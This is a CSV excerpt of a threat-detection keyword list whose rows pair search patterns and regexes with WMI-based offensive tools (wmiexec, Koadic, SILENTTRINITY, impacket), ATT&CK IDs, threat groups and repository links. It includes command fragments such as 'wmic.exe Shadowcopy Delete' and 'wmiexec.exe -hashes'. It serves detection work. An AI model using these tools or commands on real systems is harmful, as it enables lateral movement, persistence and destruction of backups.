"*wmic startup get Caption,Command,Location,User*",".{0,1000}wmic\sstartup\sget\sCaption,Command,Location,User.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","62951"
"*wmic.exe* Shadowcopy Delete*",".{0,1000}wmic\.exe.{0,1000}\sShadowcopy\sDelete.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","62960"
"*wmic/wmic.cmd*",".{0,1000}wmic\/wmic\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","62961"
"*wmicexe-whitelisting-bypass-hacking.html*",".{0,1000}wmicexe\-whitelisting\-bypass\-hacking\.html.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","62962"
"*WMIcmd.exe*",".{0,1000}WMIcmd.{0,1000}","offensive_tool_keyword","WMIcmd","This tool allows us to execute commands via WMI and get information not otherwise available via this channel.","T1059.001 - T1021 - T1210.001","TA0002 - TA0007 - TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker - COZY BEAR","Discovery","https://github.com/nccgroup/WMIcmd","1","1","N/A","N/A","N/A","4","332","77","2017-06-24T18:37:16Z","2017-05-17T06:50:12Z","62963"
"*WMICStager*",".{0,1000}WMICStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","62964"
"*wmi-event-lateral-movement.*",".{0,1000}wmi\-event\-lateral\-movement\..{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","62965"
"*WMI-EventSub.cpp*",".{0,1000}WMI\-EventSub\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","62966"
"*wmiexec *.exe*",".{0,1000}wmiexec\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","62967"
"*wmiexec.exe -hashes *",".{0,1000}wmiexec\.exe\s\-hashes\s.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","0","N/A","N/A","10","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62968"
"*wmiexec.exe"" -hashes *",".{0,1000}wmiexec\.exe\""\s\-hashes\s.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","0","N/A","N/A","10","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62969"
"*WMIExec.git*",".{0,1000}WMIExec\.git.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","N/A","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62970"
"*wmiexec.py -*",".{0,1000}wmiexec\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62971"
"*WMIEXEC: Could not retrieve output file*",".{0,1000}WMIEXEC\:\sCould\snot\sretrieve\soutput\sfile.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#content","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","62972"
"*wmiexec\wmiexec.go*",".{0,1000}wmiexec\\wmiexec\.go.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","62973"
"*wmiexec_scheduledjob.py*",".{0,1000}wmiexec_scheduledjob\.py.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","N/A","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62974"
"*wmiexec_win32process.py*",".{0,1000}wmiexec_win32process\.py.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","N/A","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62975"
"*wmiexec2.0.py*",".{0,1000}wmiexec2\.0\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","62976"
"*wmiexec2.py*",".{0,1000}wmiexec2\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","62977"
"*wmiexec2-main*",".{0,1000}wmiexec2\-main.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","62978"
"*WMIExecHash.*",".{0,1000}WMIExecHash\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","62979"
"*WMIExecHash.boo",".{0,1000}WMIExecHash\.boo","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","62980"
"*WMIExec-main*",".{0,1000}WMIExec\-main.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","N/A","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","62981"
"*wmiexec-Pro.git*",".{0,1000}wmiexec\-Pro\.git.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","62982"
"*wmiexec-pro.py*",".{0,1000}wmiexec\-pro\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","62983"
"*wmiexec-Pro/tarball*",".{0,1000}wmiexec\-Pro\/tarball.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","62984"
"*wmiexec-Pro/zipball*",".{0,1000}wmiexec\-Pro\/zipball.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","62985"
"*WMIHACKER : Login -> OK*",".{0,1000}WMIHACKER\s\:\sLogin\s\-\>\sOK.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","#content","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","62986"
"*WMIHACKER.vbs*",".{0,1000}WMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","62987"
"*wmi-lateral-movement.*",".{0,1000}wmi\-lateral\-movement\..{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","62988"
"*WMImplant*",".{0,1000}WMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","62989"
"*WMIPersist.*",".{0,1000}WMIPersist\..{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","N/A","2","113","30","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z","62990"
"*wmipersist.py*",".{0,1000}wmipersist\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","62991"
"*wmipersist.py*",".{0,1000}wmipersist\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","62992"
"*wmipersistence.py*",".{0,1000}wmipersistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","62993"
"*WMIPersistence.vbs*",".{0,1000}WMIPersistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","N/A","10","10","2689","527","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z","62994"
"*WMIPersistImplant*",".{0,1000}WMIPersistImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","62995"
